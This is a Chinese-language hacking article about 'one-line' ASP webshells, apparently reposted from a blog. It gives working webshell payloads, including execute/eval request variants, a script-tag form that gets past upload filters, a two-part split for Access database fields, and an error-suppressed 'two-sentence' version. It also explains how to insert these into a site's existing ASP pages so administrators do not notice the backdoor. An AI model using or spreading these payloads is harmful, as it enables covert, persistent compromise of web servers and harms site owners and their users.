一句话asp木马的变形与免杀处理

在进一步时,上传的文件会被服务器过滤掉,我们上传的WEBSHLL就无法运行了!

  以蓝屏最小ASP木马为例子!进行如下修改。

  原来代码是<%execute request("cmd")%> 把标签修改替换下来 为

  <scriptlanguage=VBScript runat=server>execute request("cmd")</Script> 这样就避开了<%,%>符号!

 

  表中数据段限制,一句话木马也写不下的情况

  网络中流传的最小的木马代码是<%eval request("#")%> 如过连这也写不下怎么办?

  将木马分开写就好了! <%Y=request("x")%> <%execute(Y)%> 这样分开写提交到数据库就没问题了!

  不过,在ACCESS数据库中新增加的数据物理位置是在旧数据之前的,所以要先写<%execute(Y)%>部分。写好后在客户端写密码时除了填写"x"以外的任何字符都可以,如果填了"x"就会出错!

  插入一句话容易爆错

  例如

  

Sub unlockPost()    Dim id,replyid,rs,posttable    id=Request("id")    replyid=Request("replyid")    If Not IsNumeric(id) or id="" Then

  写成

  

Sub unlockPost(<%eval request("#")%>)    Dim id,replyid,rs,posttable    id=Request("id")    replyid=Request("replyid")    If Not IsNumeric(id) or id="" Then

  就可以了,也可以写成带容错语句的格式!! 

  1.  <%if request("cmd")<>""then execute request("cmd")%> 

 

  一句话木马到两句话木马的转型!

  一句话木马服务端原型:<%execute request("value")%> ,

  变形后:<%On Error Resume Next execute request("value")%> ,

 

  至于为什么要用两句话木马呢,是由于使我们的后门更加隐蔽.

  我也试过用一句话插入WellShell的某个ASP文件里面,可是访问时经常出错,而插入两句话木马服务端却可以正常访问了,对站点的页面无任何影响.

  这样就达到了隐蔽性更强的目的了,他管理员总不会连自己的网页文件都删了吧.

  现在我的WellShell都有这样的后门.选择要插入两句话木马的ASP文件要注意,选一些可以用IE访问的ASP文件,不要选conn.asp这样的文件来插入.

  当然,连接两句话木马的客户端仍然是用一句木马的客户端,不用修改.


  原文链接:http://www.5kik.com/aspnews/332.html

相关文章

发表评论:

验证码

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。